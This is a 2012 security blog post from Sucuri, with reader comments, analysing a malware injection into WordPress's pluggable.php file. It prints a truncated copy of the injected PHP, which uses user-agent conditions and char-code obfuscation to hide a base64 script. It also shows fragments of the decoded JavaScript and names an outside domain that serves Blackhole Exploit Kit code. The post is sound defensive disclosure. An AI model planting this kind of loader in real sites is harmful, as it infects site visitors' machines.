• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
WordPress-Security-Reduce-Risk-With-Less-Plugins

WordPress Pluggable.php Being Compromised

August 15, 2012Daniel Cid

148
SHARES
FacebookTwitterSubscribe

The last few days we have seen a large number of WordPress sites compromised with a hidden malware payload that lands inside wp-includes/pluggable.php. This is not a WordPress vulnerability, WordPress is simply being targeted as the host.

This malware is not new and we have been seeing variations of it since June, 2012. However, for the last few days the number of sites compromised have multiplied, prompting this post.

We are still tracking down how the sites are getting hacked, but so far we noticed a few similarities between them.

What’s Happening?


This is what gets added to pluggable.php typically at line 810-811:

$__name = “RANDOMMD5”;
if(1>0 AND !preg_match(“#(Firefox.3)|(opera)|(chrome)|..(wget)|(yahoo)|(yandex)#i”, $_SERVER[“HTTP_USER_AGENT”]) AND empty ($_COOKIE[$__name])) {
error_reporting(0);
$date = date(“D, j M Y 00:00:00″, time()+60*60*24*30);
$cookie = time().”.”.rand(1111111, 9999999);
echo “<script type=”text/javascript”>document.cookie = “”.$__name.”=”+escape(‘”.$cookie.”‘)+”; expires=”.$date.”; path=/”;”;
$__f = implode(“”, array_map(“chr”, explode(” “, “98 97 115 101 54 52 95 100 101 99 111 100 101”)));
echo $__f(“PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmluc..

If you are not familiar with PHP, this is conditional malware. The code checks the browser of the person visiting the site, and only displays if a few conditions are met: Browser (user agent) must not be Opera, Chrome, or Firefox 3, and traffic should not originate from a search engine (Google, Yahoo, etc).

Decode and Analyze


When you look at all the exclusions, it seems the malware is focusing on Windows users running Internet Explorer, or new versions of Firefox. After decoding the malware, we understand why. The following javaScript is executed in the browser:

<script type=”text/javascript”>document.cookie = “db6c..eed1f235454f7
=”+escape(‘123.456’)+”; expires=Fri, 14 Sep 2012 00:00:00; path=/”..
<script type=”text/javascript”>pal=0; pal-=5884; his=0.0034;his–;wax=7474;i
f(wax>0.0101){was=0.0106;cap=0.0359;if(cap<7740){hon=7;hon++}}kue=23;if..

This is fully random and changes per site. Often the payload starts as:

kos=26;   kos+=8147;zag=2832;pic=17;pic++;ins=..

or

ama=0.001;  if(ama>0){you=7336;you-=7397;chi=11;chi++}dun=0.035;dun–;pah=2404;pah–;

or

vac=0.0012;if(vac==0.0075){irk=null}foy=null;kop=9;kop+=17;bid=sea

Where’s it start


There are many other variations. Once decoded it attempts to load additional exploit code from:

http://qckdqxeu.co.tv/ckp2wnzxwiwrq41

From there it tries to exploit the user using the Blackhole Exploit Kit. Be advised that there are other domains in the .co.tv TLD doing the same thing, it is not limited to the one we’re pointing out. More to come on that!

This exploit kit focuses on Windows vulnerabilities, and it also shows a slight increase on the AVG Threat Labs page for the Phoenix Exploit Kit.

As always, we will post more details when we have it.

148
SHARES
FacebookTwitterSubscribe

Categories: Website Malware Infections, WordPress SecurityTags: Hacked Websites, Malware Updates

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Reader Interactions

Comments

  1. Desmond

    August 16, 2012

    Thanks so much for the post!! Any word on how it’s getting in? I’ve cleaned out my files twice, changed all passwords, and made sure everything was up to date…and it’s back. It keeps adding a random 32 string file to my root as well as base 64 code to the index files.

  2. sarabjeet singh

    October 3, 2012

    i really like that you are providing information on PHP and MYSQL with basic JAVASCRIPT,being enrolled in http://www.wiziq.com/course/5871-php-mysql-with-basic-javascript-integrated-course i was looking for such information online to assist me on php and mysql and your information helped me a lot. Thanks.

  3. ABL

    June 1, 2015

    My pluggable.php files are being compromised this week across 10 sites
    on my server — and I don’t know what to do! Any help you can provide?!

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

WordPress Security Course

The Anatomy of Website Malware Webinar

WordPress Security Guide

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.